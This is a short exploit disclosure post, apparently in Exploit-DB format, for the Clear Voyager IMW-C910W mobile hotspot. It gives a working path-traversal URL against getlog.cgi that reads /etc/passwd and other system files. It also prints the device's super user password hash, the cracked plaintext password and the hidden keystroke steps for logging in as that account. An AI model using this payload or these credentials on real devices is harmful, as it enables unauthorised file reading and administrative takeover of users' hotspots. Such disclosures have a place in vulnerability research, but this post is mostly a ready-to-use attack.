Friday, July 15, 2016

clear voyager hotspot IMW-C910W - file disclosure

  1. # Exploit Title: clear voyager hotspot IMW-C910W - file disclosure
  2. # Date: 2016/jul/15
  3. # Exploit Author: Damaster
  4. # Vendor Homepage: https://www.sprint.com/
  5. # Software Link: https://web.archive.org/web/20150526042938/http://www.clearwire.com/downloads/IMW-C910W_V2234_R4383A.bin
  6. # Version: R4383
  7. poc : http://192.168.1.1/cgi-bin/getlog.cgi?filename=../../etc/passwd
  8. vulnerable Device Software Version : R4383
  9. super user password
  10. =================
  11. file : /etc/httpd/super.htpasswd
  12. content : super:YBfFG25mEAdSg
  13. =================


cracked password is : engadmin



to login with super user account :
1- keep press ctrl+shift+e and click on device image
2- enter password "engadmin" in box and press enter